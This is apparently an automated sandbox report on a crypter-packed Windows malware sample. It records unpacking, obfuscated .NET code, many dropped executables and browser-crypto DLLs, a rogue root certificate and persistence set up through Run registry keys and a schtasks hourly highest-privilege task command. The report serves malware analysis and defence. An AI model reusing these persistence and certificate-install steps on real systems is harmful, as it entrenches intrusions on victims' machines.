Source:	Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1852324342.0000000000F59000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: BotClient.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp, j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Unpacked PE file: 12.2.pZhQ7nTCR9R3A5r5QIQYLapT.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	Unpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe

Unpacked PE file: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Unpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: 0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3ECB7 pushfd ; ret	0_2_04C3ECC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3EEC3 pushfd ; ret	0_2_04C3EEC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3EF57 pushfd ; ret	0_2_04C3EF5E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3EF6B pushfd ; ret	0_2_04C3EF72
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Code function: 0_2_04C3E9E7 pushfd ; ret	0_2_04C3E9EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00567110 push ecx; ret	2_2_00567123
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Code function: 6_2_02D42809 push eax; retf 0071h	6_2_02D4280A
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_004065C8 push 00406605h; ret	8_2_004065FD
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_004040B5 push eax; ret	8_2_004040F1
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_00408104 push ecx; mov dword ptr [esp], eax	8_2_00408109
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_00404185 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_00404206 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_0040C218 push eax; ret	8_2_0040C219
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_004042E8 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_00404283 push 00404391h; ret	8_2_00404389
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: 8_2_00408F38 push 00408F6Bh; ret	8_2_00408F63
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Code function: 10_2_05A45C40 pushad ; retf	10_2_05A45C41
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Code function: 11_2_02262809 push eax; retf 0071h	11_2_0226280A
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_004014D9 pushad ; ret	12_2_004014E9
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_004031DB push eax; ret	12_2_004032AB
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_02601540 pushad ; ret	12_2_02601550
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_026D3F53 push esp; ret	12_2_026D3F55
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_026D22F6 push B63524ADh; retn 001Fh	12_2_026D232D
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_026D2DF3 pushfd ; iretd	12_2_026D2DF4
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Code function: 13_2_027B2809 push eax; retf 0071h	13_2_027B280A
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Code function: 14_2_03152809 push eax; retf 0071h	14_2_0315280A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00503196 push ecx; ret	15_2_005031A9
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_004107EE push 02E98151h; retf 0000h	15_2_004107F3
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00502A1C push ecx; ret	15_2_00502A2F

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, KASIU9JAUDHSAHJDUHUDASUDUADAI0DKSFISJFUDHUFHHYU.cs	High entropy of concatenated method names: 'OMFx84NSU3Aj89yeQCX', 'LAX01SNrXLuYFtkUKZE', 'iy9SsMNm29gB450FtMd', 'dBJrEtNGIa6qVBG9EBQ', 'rVg9gbNXhuTUCax3Faw', 'SqGmZ9Nwos9SN5Q7lkZ', 'GSe2iiNdiIejkDmaBS8', 'LqmMVpNxj2A5NG3wBxw', 'gYNBsNNfxAmxgoLk8AY', 'YxEaVbN7rCtxCfwOIGb'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, psm102r62ZNKXfMgLP.cs	High entropy of concatenated method names: 'OPSws322xfEh0', 'MODr39Nq5MiabxlX31k', 'iQoS09NJ2QNv2l3Nldp', 'CJQKDaN3RqE5Z376xIt', 'pj3HvaNg4CuSslIZxHe', 'aGob5JNuDhjrh89tMF7', 'OJrIsVNcKpdpxmnyCdy', 'nvy9T7NQKdlZSSpjdYZ', 'VWEEy8N4s3YgJEZssn2', 'hiS9r5NbbCsErEIxnl5'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Component1.cs	High entropy of concatenated method names: 'Dispose', 'c2ZnNKXfM', 'KdItahZbaqrPOGXMMIH', 'F6Y0glZWI5sNge0KygR', 'oiohBeZubh6iBGSEkrx', 'eHnLj8Z41B6OG7M1JDy', 'N4gwHqZEFQ33Xh9XSL4', 'UsxTXAZipbL0y4O7ig6', 'lWEAf5ZlGZ9tBNchonB'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, UserControl1.cs	High entropy of concatenated method names: 'Dispose', 'F2igcbrUX', 'XHGgAUZzLmxCg9LHS8J', 'S8TWddN28E6t6e1W5DI', 'nxnywSZIvTRDeZkh3vn', 'Lg0nedZDohNDcCeYfhA', 'MCqqDaNZbmCaRq0a6S3', 'pte1vQNNcjSXyOcA1wm', 'FihZepNhpEadD2XS1mj', 'v4bBBrN14WWJwYVFB1v'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Hg0i8ysWBkmOQpOTDa.cs	High entropy of concatenated method names: 'BBiryfpB2', 'KI0GlCWQr', 'nZK2JcQAs', 'lkTeKjlkc', 'RYq1Z9XkI', 'XOTf7va1f', 'Dispose', 'YAroKCCXX', 'acfjChBBkMo7PdIk7G', 'MFS1TWc0IT345kpNHi'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.cs	High entropy of concatenated method names: 'Qr5ud0NzY98AOC9xd95', 'G0Y0Wrh2oh1RhmJKSXb', 'X83AawNIkZucWFsrjDy', 'uZXqgXNDChJaWlp6NOY', 'ce4DmfsmSrOT856tDgfrkMb', 'qNiCQfbwXf', 'TgalQGhh96LsT9w8Qmj', 'Fw7QQNh18VntnfmGixE', 'ILFoXIhoc2Bm12rmWG4', 'AZNUskhyETNOaYTT1jk'

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\sdhsfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66ee79315857f_setup33333[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	File created: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66e705d09b33c_jack[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\noode[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File created: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BDTFI.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BKLVU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-KPLGI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66eea6336b153_app16540406983468141987[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	File created: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-Q0C3D.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	File created: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ahcsduh	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66edb89bc4073_crypted[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-LNCCE.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	File created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\66ed9885d9aee_Day2[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-P2EA6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	File created: C:\Users\user\AppData\Local\Nikko Video Compressor\is-JC1FU.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AKEGHIJJEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	File created: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	File created: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\AKEGHIJJEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	File created: C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ahcsduh

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dell
